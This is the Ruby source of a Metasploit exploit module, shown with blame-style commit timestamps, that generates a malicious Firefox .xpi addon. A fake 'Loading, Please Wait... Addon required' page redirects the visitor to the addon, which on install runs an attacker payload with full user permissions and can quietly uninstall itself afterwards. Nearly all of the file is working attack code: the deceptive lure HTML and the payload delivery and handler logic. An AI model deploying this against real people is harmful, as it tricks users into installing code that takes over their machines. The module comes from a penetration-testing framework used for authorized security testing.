2012-04-10 11:33:04 +00:00
|
|
|
##
|
2013-10-15 18:50:46 +00:00
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2012-04-10 11:33:04 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex'
|
|
|
|
require 'rex/zip'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
2013-12-19 02:35:43 +00:00
|
|
|
include Msf::Exploit::Remote::FirefoxAddonGenerator
|
2013-08-30 21:28:54 +00:00
|
|
|
|
|
|
|
def initialize( info = {} )
|
|
|
|
super( update_info( info,
|
|
|
|
'Name' => 'Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution',
|
|
|
|
'Description' => %q{
|
|
|
|
This exploit dynamically creates a .xpi addon file.
|
|
|
|
The resulting bootstrapped Firefox addon is presented to
|
2014-01-02 07:10:08 +00:00
|
|
|
the victim via a web page. The victim's Firefox browser
|
2013-08-30 21:28:54 +00:00
|
|
|
will pop a dialog asking if they trust the addon.
|
|
|
|
|
|
|
|
Once the user clicks "install", the addon is installed and
|
|
|
|
executes the payload with full user permissions. As of Firefox
|
|
|
|
4, this will work without a restart as the addon is marked to
|
|
|
|
be "bootstrapped". As the addon will execute the payload after
|
|
|
|
each Firefox restart, an option can be given to automatically
|
|
|
|
uninstall the addon once the payload has been executed.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
2014-01-02 07:10:08 +00:00
|
|
|
'Author' => [ 'mihi', 'joev' ],
|
2013-08-30 21:28:54 +00:00
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'URL', 'https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions' ],
|
2014-09-02 17:27:35 +00:00
|
|
|
[ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ]
|
2013-08-30 21:28:54 +00:00
|
|
|
],
|
2013-12-18 20:42:01 +00:00
|
|
|
'DisclosureDate' => 'Jun 27 2007'
|
2013-08-30 21:28:54 +00:00
|
|
|
))
|
|
|
|
end
|
|
|
|
|
2014-01-02 07:10:08 +00:00
|
|
|
def on_request_uri(cli, request)
|
|
|
|
if request.uri.match(/\.xpi$/i)
|
|
|
|
# browser has navigated to the .xpi file
|
|
|
|
print_status("Sending xpi and waiting for user to click 'accept'...")
|
|
|
|
if not xpi = generate_addon_xpi(cli)
|
|
|
|
print_error("Failed to generate the payload.")
|
|
|
|
send_not_found(cli)
|
|
|
|
else
|
|
|
|
send_response(cli, xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })
|
|
|
|
end
|
|
|
|
else
|
|
|
|
# initial browser request
|
|
|
|
# force the user to access a directory-like URL
|
2013-08-30 21:28:54 +00:00
|
|
|
if not request.uri.match(/\/$/)
|
2014-01-02 07:10:08 +00:00
|
|
|
print_status("Redirecting request." )
|
|
|
|
send_redirect(cli, "#{get_resource}/")
|
|
|
|
else
|
|
|
|
# user has navigated
|
|
|
|
print_status("Sending response HTML." )
|
|
|
|
send_response_html(cli, generate_html)
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2014-01-02 07:10:08 +00:00
|
|
|
handler(cli)
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def generate_html
|
2014-09-02 17:27:35 +00:00
|
|
|
html = %Q|<html><head><title>Loading, Please Wait...</title></head>\n|
|
|
|
|
html << %Q|<body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>\n|
|
|
|
|
html << %Q|<script>window.location.href="addon.xpi";</script>\n|
|
|
|
|
html << %Q|</body></html>|
|
|
|
|
return html
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2012-04-10 11:33:04 +00:00
|
|
|
end
|